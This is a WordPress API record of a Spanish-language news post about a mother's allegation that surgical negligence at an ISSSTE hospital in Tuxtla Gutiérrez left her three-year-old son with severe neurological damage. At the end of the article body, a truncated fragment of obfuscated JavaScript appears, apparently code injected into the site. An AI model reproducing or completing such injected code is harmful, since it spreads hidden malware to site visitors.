{"id":21990,"date":"2025-05-20T04:00:39","date_gmt":"2025-05-20T04:00:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21990"},"modified":"2025-05-20T04:00:40","modified_gmt":"2025-05-20T04:00:40","slug":"menor-podria-quedar-en-estado-vegetal-por-presunta-negligencia-medica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21990","title":{"rendered":"Menor podr\u00eda quedar en estado vegetal por presunta negligencia m\u00e9dica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018-1024x576.jpg\" alt=\"\" class=\"wp-image-21991\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0018.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>19 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes Elibeth Hern\u00e1ndez Hern\u00e1ndez, madre de un ni\u00f1o de tres a\u00f1os, acus\u00f3 por presunta negligencia a un m\u00e9dico cirujano del hospital Belisario Dom\u00ednguez del ISSSTE por presunta negligencia lo que podr\u00eda dejar en estado vegetal al menor.<\/p>\n\n\n\n<p>Record\u00f3 que su hijo Jonathan Santiago Cristiani Hern\u00e1ndez ingres\u00f3 por un cuadro de apendicitis y terminara con da\u00f1os neurol\u00f3gicos graves.<\/p>\n\n\n\n<p>Seg\u00fan el testimonio de la madre, el menor ingres\u00f3 al hospital el pasado 8 de abril por un dolor abdominal que \u00e9l mismo lograba expresar en la zona donde se ubica el ap\u00e9ndice. Sin embargo, tras realizarle estudios como an\u00e1lisis de sangre, radiograf\u00edas y un ultrasonido, los m\u00e9dicos determinaron que no se trataba de apendicitis.<\/p>\n\n\n\n<p>Fue hasta el 10 de abril, y ya en estado grave, que los doctores decidieron realizar una cirug\u00eda de emergencia. La operaci\u00f3n, que inici\u00f3 como una laparoscop\u00eda, termin\u00f3 en una laparotom\u00eda, y durante el procedimiento, seg\u00fan la denuncia, se lesion\u00f3 un vaso sangu\u00edneo que va hacia la pierna izquierda del menor, provoc\u00e1ndole una hemorragia masiva y un paro card\u00edaco de 27 minutos.<br>Tras la cirug\u00eda, el menor fue inmovilizado con vendajes en las piernas por una posible trombosis. La madre asegura que su hijo, quien antes era completamente sano, ahora enfrenta problemas neurol\u00f3gicos severos que afectan su movilidad y lenguaje.<br>Erisel Hern\u00e1ndez tambi\u00e9n se\u00f1al\u00f3 que hasta el momento no se le ha permitido tener acceso a la tomograf\u00eda que le realizaron al ni\u00f1o antes de ingresar por segunda vez al quir\u00f3fano, lo que considera un acto de opacidad por parte del hospital.<br>La madre de Jonathan Santiago precis\u00f3 que en el cirujano identificado en esta denuncia es el doctor Mundo Alegr\u00eda, y asever\u00e1 que el ISSSTE lo proteje.<br>La familia exige que se garantice el acceso a servicios de rehabilitaci\u00f3n para el menor y que se acelere su traslado a la Ciudad de M\u00e9xico, ya que la consulta de seguimiento fue programada hasta el 14 de julio, una fecha que consideran inaceptable dadas las condiciones de salud del menor.<br>\u201cMi hijo no entr\u00f3 con problemas neurol\u00f3gicos, era un ni\u00f1o sano, activo, y ahora lucha por hablar, por caminar. Esta situaci\u00f3n nos ha afectado en todo: emocional, econ\u00f3mica y familiarmente. Tenemos otro beb\u00e9 de 10 meses y hemos tenido que separarnos para poder atender a ambos\u201d, expres\u00f3 la madre visiblemente afectada.<br>Hasta el momento, el ISSSTE no ha emitido un posicionamiento oficial sobre el caso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 19 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes Elibeth Hern\u00e1ndez Hern\u00e1ndez, madre de un ni\u00f1o de tres a\u00f1os, acus\u00f3 por presunta negligencia a un m\u00e9dico cirujano del hospital Belisario Dom\u00ednguez del ISSSTE por presunta negligencia lo que podr\u00eda dejar en estado vegetal al menor. Record\u00f3 que su hijo Jonathan Santiago Cristiani Hern\u00e1ndez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21991,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21990","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21990"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21990\/revisions"}],"predecessor-version":[{"id":21992,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21990\/revisions\/21992"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21991"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21990"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}